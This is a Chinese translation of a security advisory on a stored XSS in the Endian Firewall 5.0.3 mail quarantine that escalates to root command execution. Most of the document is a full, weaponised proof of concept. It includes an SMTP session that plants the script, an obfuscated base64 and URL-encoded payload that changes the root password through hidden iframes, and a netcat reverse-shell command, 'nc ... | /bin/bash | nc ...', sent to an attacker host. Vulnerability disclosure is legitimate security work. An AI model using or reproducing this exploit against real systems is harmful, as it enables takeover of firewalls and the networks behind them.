SSD安全公告-Endian防火墙从存储型XSS到远程命令执行

漏洞概要
以下安全公告描述了在Endian防火墙5.0.3版本中存在的一个存储型XSS漏洞,成功利用该漏洞可造成远程代码执行。
Endian防火墙是一个“专注Linux安全的发行版本,,它是一个独立的,统一的安全管理操作系统。 Endian防火墙基于强化的Linux操作系统。”
漏洞提交者
一位独立的安全研究者向 Beyond Security 的 SSD 报告了该漏洞
厂商响应
厂商已经发布针对该漏洞的补丁。获取更多信息: https://help.endian.com/hc/en-us/articles/115012996087

漏洞详细信息
Endian防火墙是基于Linux的防火墙/网关。
它使用不同的颜色来标记其trusted,untrusted 和DMZ网络:

  • 绿色 – trusted网络
  • 红色 – untrusted 网络
  • 橙色 – DMZ
  • 蓝色 – WiFi

用户可控的输入没有经过充分过滤,通过从untrusted 网络(红色)发送电子邮件到DMZ上的邮件服务器(橙色),Endian防火墙会把来自untrusted 网络的电子邮件隔离。
当来自trusted网络(绿色)的用户登录到Endian Firewall WebAdmin并检查隔离区中的电子邮件(Services > Mail Quarantine > quarantine)时,会执行存储型XSS脚本。
漏洞证明
配置环境

  • 安装Endian防火墙虚拟机并设置防火墙网络接口为以下IP:
  1. 绿色 – 192.168.0.190
  2. 红色 – 192.168.0.192
  • 设置以下密码:
  1. Web管理员(admin/Password1)
  2. SSH管理员(root/Password1)
  • 连接Webadmin接口,添加ORANGE网络并更改GREEN IP。最后的环境应该是这样的:
  1. 防火墙界面GREEN – 192.168.10.190
  2. 防火墙接口ORANGE – 192.168.20.190
  3. 防火墙接口RED – 192.168.0.192
  • 现在我们添加以下机器到新的接口:
  1. 部署VM并将其IP设置为192.168.10.191(GREEN) – 用于连接到Endian WebAdmin
  2. 部署VM并将其IP设置为192.168.20.191(ORANGE) – 用作邮件服务器
  3. 部署虚拟机并将其IP设置为192.168.0.12(RED) – 用于触发此漏洞(通过发送恶意邮件)并接受反连shell

接下来是按照Endian指令配置SMTP代理
http://help.endian.com/hc/it/articles/218144808-Mail-Proxy-Basic-Setup

  • “Incoming domain”==”test.it”
  • SMTP Proxy>Advanced,你必须取消选中”Recipient address verification”

演示
在红色PC(192.168.0.12)上监听25端口 (”netcat nc 192.168.0.12 25”)并发送以下电子邮件(使用telnet):

helo what-you-want <ENTER>
mail from:attacker@mydomain.it <ENTER>
rcpt to:victim@test.it <ENTER>
data <ENTER>
subject: test <h1>html</h1> injection <ENTER>
. <ENTER>

从绿色PC,连接到WebAdmin,并转到Services > Mail Quarantine > quarantine,会看到HTML代码被执行。
完整的漏洞证明
现在我们要想要获得root权限:

  1. 更改系统的root密码(System>Status> SSH Password)
  2. 通过Web Shell控制台(System> Web Consolle),使用root的新密码访问系统shell
  3. 通过在操作系统上执行一个root命令,获取远程Red PC的shell访问
  4. 我们也可以检查SSH是否被禁用,如果被禁用,可以启用它

所有内容都可以合并到一个subject中,但是我们必须考虑RFC 2822第2.1.1节中关于电子邮件”subject:”的规范:“每行不能超过998个字符”。
所以每998个字符后,Endian SMTP代理服务插入一个换行符。 这意味着我们的subject(AKA攻击脚本)可以超过998个字符,但是如果我们发送的JavaScript命令超过998个字符,那么脚本将被截断,导致攻击失败。
例1

......998..............     <---- BAD, in Endian WebAdmin this will be converted in
.......|...............           alert('d
alert('demo');                    emo'); ----> Script not working

例2

......998..............     <---- GOOD, in Endian WebAdmin this will be converted in
.......|...............           ;;;;;;;;
;;;;;;;;;alert('demo');           ;alert('demo'); ----> Script working

这就是为什么在攻击脚本中你会看到一组分号:它们是作为空操作(NOP)使用的。
注1:使用netcat或telnet发送的所有东西都必须在一行中(不管Endian如何对待它)
注2:我们使用两种基本的编码器来避免某些字符。
在第一部分,我们看到一个Base64编码,除非你想自定义密码,否则不需要修改它。
在最后一部分,我们看到使用URL编码名为”paystr”的JavaScript变量。
它的值 – %6E%63%20%31%30%2E%38%2E%30%2E%36%20%35%33%20%7C%20%2F%62%69%6E%2F%62 %61%73%68%20%7C%20%6E%63%20%31%30%2E%38%2E%30%2E%36%20%38%30’等于:

 'nc 192.168.0.12 53 | /bin/bash | nc 192.168.0.12 80'

如果你要执行不同的操作系统命令,则需要对其进行修改
注3:在攻击脚本尾部时,会看到一段很长的分号字符串,然后接着的是经编码后发送到系统的payload(var paystr)。 如果要发送的命令更长或者更短,那么以分号填充,但记得至少保留3个分号。

%00%00%00%00%00%00%00%00%00';;;;;;;;;;;;;;;;;;;;;;; 	< ---- Original
%00%00%00%00%00%00%00%00%00%00%00';;;;;;;;;;;;;;;;;  	<---- More Payload
%00%00%00%00%00%00%00';;;;;;;;;;;;;;;;;;;;;;;;;;;;;  	<---- Less Payload

下面的payload将root密码更改为”peruperu”,并向192.168.0.12上启动的两个监听器(netcat)发起连接请求。
我们使用TCP端口53和80,因为默认情况下,Endian通过这两个端口传递信息。
在Red PC上启动2个监听器(nc -lvp 80和nc -lvp 53),连接到邮件服务器(nc 192.168.0.12 25),按照PoC的步骤发送电子邮件:

subject:Pe<iframe id="peru" name="peru" style="width:0; height:0; border:0; border:none; visibility:0"></iframe><iframe id="xu" onload="res =
atob('PGlmcmFtZSBpZD0neHUxJyBvbmxvYWQ9InZhciB1cmwgPSB3aW5kb3cubG9jYXRpb24uaHJlZjt2YXIgYXJyID0gdXJsLnNwbGl0KCcvJy
k7dmFyIElQViA9IGFyclswXSArICcvLycgKyBhcnJbMl07ZnVuY3Rpb24gcG9zdHdpdGggKHRvLHApe3ZhciBteUZvcm0gPSBkb2N1bWVudC5jcm
VhdGVFbGVtZW50KCdmb3JtJyk7bXlGb3JtLm1ldGhvZD0ncG9zdCc7bXlGb3JtLmFjdGlvbiA9IHRvO2ZvciAodmFyIGsgaW4gcCl7dmFyIG15SW
5wdXQgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdpbnB1dCcpO215SW5wdXQuc2V0QXR0cmlidXRlKCduYW1lJywgayk7bXlJbnB1dC5zZXRBdH
RyaWJ1dGUoJ3ZhbHVlJywgcFtrXSk7bXlGb3JtLmFwcGVuZENoaWxkKG15SW5wdXQpO31kb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKG15Rm9ybS
k7bXlGb3JtLnN1Ym1pdCgpO2RvY3VtZW50LmJvZHkucmVtb3ZlQ2hpbGQobXlGb3JtKTt9O3Bvc3R3aXRoKElQVisnL2NnaS1iaW4vY2hhbmdlcH
cuY2dpJyx7J0FDVElPTl9ST09UJzonc2F2ZScsJ1JPT1RfUEFTU1dPUkQxJzoncGVydXBlcnUnLCdST09UX1BBU1NXT1JEMic6J3BlcnVwZXJ1Jy
wnc3VibWknOidDaGFuZ2UrUGFzc3dvcmQnfSk7Ij48L2lmcmFtZT4=');;;;;;;;;;;;;;;;;;
document.getElementById('peru').contentWindow.document.write(res);
document.getElementById('peru').contentWindow.document.close();" style="width:0; height:0; border:0; border:none;
visibility:0"></iframe><iframe id="1" style="width:0; height:0; border:0; border:none; visibility:0"
onload="var url = window.location.href;var arr = url.split('/');var IPV = arr[0] + '//' + arr[2];var add =
'/manage/webshell/u?s=222&w=100&h=24&k=';var end = '%0D&l=2';function login() {var login =
document.createElement('iframe');login.setAttribute('src', IPV+add+'login'+end);
login.setAttribute('style', 'width:0; height:0; border:0; border:none;
visibility:0');document.body.appendChild(login);}setTimeout(login, 1000);"></iframe><iframe id="2"
style="width:0; height:0; border:0; border:none; visibility:0"
onload="var url = window.location.href;var arr = url.split('/');var IPV = arr[0] + '//' + arr[2];
var add = '/manage/webshell/u?s=222&w=100&h=24&k=';var end =
'%0D&l=2&_=1504015893518';;;;;;;;;;;;;;;;;;;;;;;function passwd22() {var t = 1;var passwd =
document.createElement('iframe');passwd.setAttribute('src',
IPV+add+'peruperu'+end);passwd.setAttribute('style', 'width:0; height:0; border:0; border:none; visibility:0');
document.body.appendChild(passwd);}setTimeout(passwd22, 3000);"></iframe><iframe id="3" style="
width:0; height:0; border:0; border:none; visibility:0" onload="var url = window.location.href;var arr = url.split('/');var
IPV = arr[0] + '//' + arr[2];var add = '/manage/webshell/u?s=222&w=100&h=24&k=';
var end = '%0D&l=2&_=1504014893519';var paystr= '%6E%63%20%31%39%32%2E%31%36%38%2E%30%2E%31%32%20%35%33%20%7C%20%2F%62%69%6E%2F%62%61%73%68%20%7C%20%6E%63%20%31
%39%32%2E%31%36%38%2E%30%2E%31%32%20%38%30';;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
function payload() {var payload = document.createElement('iframe');payload.setAttribute('src', IPV+add+paystr+end);
payload.setAttribute('style', 'width:0; height:0; border:0; border:none; visibility:0');
document.body.appendChild(payload);}setTimeout(payload, 5000);"></iframe>rU 

?

Get in touch